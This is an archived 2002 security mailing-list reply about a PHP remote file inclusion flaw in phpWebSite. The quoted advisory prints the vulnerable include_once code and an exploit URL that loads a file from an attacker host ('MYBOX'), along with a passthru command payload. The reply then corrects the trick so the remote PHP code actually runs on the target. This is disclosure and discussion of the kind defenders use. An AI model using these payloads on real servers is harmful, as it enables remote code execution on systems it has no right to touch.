lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <746.1032800681@www15.gmx.net>
From: avart at gmx.de (avart@....de)
Subject: Re: PHP source injection in phpWebSite

Hi Tim!

> -------- modsecurity.php --------
> <?php
>  global $inc_prefix;
>  if(!$inc_prefix) {
>  ...
>  }
>  ...
>  include_once($inc_prefix."htmlheader.php");
> ?>
> ----------------------------------
>  
> If someone request a URL like 
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, 
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he 
> wants.
>  
> Examples
> ======== 
> http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
>  
> --- htmlheader.php ---
> <? passthru("/bin/ls") ?>
> ----------------------
> 
> Output: dir listing of the current dierctory

That's not completely right. You have to put an "echo" (with the right
quoting around the evil code), because the evil webserver (MYBOX) usually execute
files ending with .php (if MYBOX doesn't
do it, the example is ok).
So usually you want to put the following line in htmlheader.php on the evil
server (MYBOX):
<?php echo "<?php phpinfo();?>" ?> .
Now, if you request MYBOX/htmlheader.php the following line would be
included (and executed):
<?php phpinfo();?>

In the example of Tim, the /bin/ls output from the evil machine (MYBOX)
would be included, because
htmlheader (usually) get's executed, because of the .php suffix.
It's important to point to it, I got a lot of mails from users, that didn't
get how to include $evil_code 
when $evil_machine (aka MYBOX) interpretes files with the .php suffix.

Just my 0,2 EUR-Cents

Regards,
Avart

-- 
Werden Sie mit uns zum "OnlineStar 2002"! Jetzt GMX w?hlen -
und tolle Preise absahnen! http://www.onlinestar.de


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ